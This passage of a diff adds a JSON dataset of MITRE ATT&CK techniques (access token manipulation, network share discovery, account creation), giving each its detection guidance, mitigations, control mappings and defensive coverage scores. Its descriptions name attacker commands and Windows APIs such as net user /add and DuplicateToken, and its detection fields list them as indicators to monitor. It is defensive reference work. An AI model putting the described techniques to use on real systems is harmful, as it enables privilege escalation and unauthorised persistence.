+                "detection": "Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)\n\nMonitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1134.005",
+                "name": "Access Token Manipulation: SID-History Injection",
+                "url": "https://attack.mitre.org/techniques/T1134/005",
+                "description": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).",
+                "detection": "Examine data in user’s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)\n\nMonitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)",
+                "mitigations": [
+                    {
+                        "mid": "M1015",
+                        "name": "Active Directory Configuration",
+                        "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1015"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.4169948442857143,
+        "adjusted_score": 0.4169948442857143,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "IA-2"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.2142857142857143,
+            "mitigation_score": 0.2545454545454545,
+            "detection_score": 0.17
+        },
+        "choke_point_score": 0.2,
+        "prevalence_score": 0.00270913
+    },
+    {
+        "tid": "T1134.001",
+        "name": "Access Token Manipulation: Token Impersonation/Theft",
+        "description": "Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.\n\nAn adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.",
+        "url": "https://attack.mitre.org/techniques/T1134/001",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nAnalysts can also monitor for use of Windows APIs such as DuplicateToken(Ex),  ImpersonateLoggedOnUser , and  SetThreadToken  and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1134",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.2857142857142857,
+        "adjusted_score": 0.2857142857142857,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "IA-2"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1134.002",
+        "name": "Access Token Manipulation: Create Process with Token",
+        "description": "Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs)\n\nCreating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).",
+        "url": "https://attack.mitre.org/techniques/T1134/002",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "If an adversary is using a standard command-line shell (i.e. [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)), analysts may detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts may detect token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1134",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.2761904761904762,
+        "adjusted_score": 0.2761904761904762,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "IA-2"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1134.003",
+        "name": "Access Token Manipulation: Make and Impersonate Token",
+        "description": "Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.",
+        "url": "https://attack.mitre.org/techniques/T1134/003",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as LogonUser and  SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1134",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.24285714285714285,
+        "adjusted_score": 0.24285714285714285,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "IA-2"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1134.004",
+        "name": "Access Token Manipulation: Parent PID Spoofing",
+        "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)",
+        "url": "https://attack.mitre.org/techniques/T1134/004",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)\n\nMonitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Process: OS API Execution",
+            "Process: Process Creation",
+            "Process: Process Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1134",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.11904761904761905,
+        "adjusted_score": 0.11904761904761905,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1134.005",
+        "name": "Access Token Manipulation: SID-History Injection",
+        "description": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).",
+        "url": "https://attack.mitre.org/techniques/T1134/005",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "Examine data in user’s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)\n\nMonitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Object Modification",
+            "Process: OS API Execution",
+            "User Account: User Account Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1134",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1015",
+                "name": "Active Directory Configuration",
+                "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1015"
+            }
+        ],
+        "cumulative_score": 0.24761904761904763,
+        "adjusted_score": 0.24761904761904763,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-20",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CM-2",
+            "CM-6",
+            "SA-11",
+            "SA-17",
+            "SA-4",
+            "SA-8",
+            "SC-3"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1135",
+        "name": "Network Share Discovery",
+        "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\\\\\remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.",
+        "url": "https://attack.mitre.org/techniques/T1135",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            }
+        ],
+        "cumulative_score": 0.20741303476190476,
+        "adjusted_score": 0.20741303476190476,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CM-6",
+            "CM-7",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.10476190476190475,
+            "mitigation_score": 0.10909090909090909,
+            "detection_score": 0.1
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00265113
+    },
+    {
+        "tid": "T1136",
+        "name": "Create Account",
+        "description": "Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\n\nAccounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.",
+        "url": "https://attack.mitre.org/techniques/T1136",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.\n\nCollect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "User Account: User Account Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1136.001",
+                "name": "Create Account: Local Account",
+                "url": "https://attack.mitre.org/techniques/T1136/001",
+                "description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
+                "detection": "Monitor for processes and command-line parameters associated with local account creation, such as net user /add , useradd , and dscl -create . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.",
+                "mitigations": [
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1136.002",
+                "name": "Create Account: Domain Account",
+                "url": "https://attack.mitre.org/techniques/T1136/002",
+                "description": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
+                "detection": "Monitor for processes and command-line parameters associated with domain account creation, such as net user /add /domain. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain accounts to detect suspicious accounts that may have been created by an adversary.",
+                "mitigations": [
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1030",
+                        "name": "Network Segmentation",
+                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                        "url": "https://attack.mitre.org/mitigations/M1030"
+                    },
+                    {
+                        "mid": "M1028",
+                        "name": "Operating System Configuration",
+                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1028"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1136.003",
+                "name": "Create Account: Cloud Account",
+                "url": "https://attack.mitre.org/techniques/T1136/003",
+                "description": "Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)\n\nAdversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.",
+                "detection": "Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.",
+                "mitigations": [
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1030",
+                        "name": "Network Segmentation",
+                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                        "url": "https://attack.mitre.org/mitigations/M1030"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.6693437690476189,
+        "adjusted_score": 0.6693437690476189,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.12",
+            "4.1",
+            "4.2",
+            "4.4",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.3",
+            "6.4",
+            "6.5",
+            "11.3",
+            "11.4",
+            "12.2",
+            "12.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "IA-5",
+            "SC-46",
+            "SC-7",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.419047619047619,
+            "mitigation_score": 0.6,
+            "detection_score": 0.22
+        },
+        "choke_point_score": 0.25,
+        "prevalence_score": 0.00029615
+    },
+    {
+        "tid": "T1136.001",
+        "name": "Create Account: Local Account",
+        "description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
+        "url": "https://attack.mitre.org/techniques/T1136/001",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Monitor for processes and command-line parameters associated with local account creation, such as net user /add , useradd , and dscl -create . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "User Account: User Account Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1136",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.3666666666666667,
+        "adjusted_score": 0.3666666666666667,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.4",
+            "6.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1136.002",
+        "name": "Create Account: Domain Account",
+        "description": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
+        "url": "https://attack.mitre.org/techniques/T1136/002",
+        "tactics": [
+            "Persistence"
+        ],
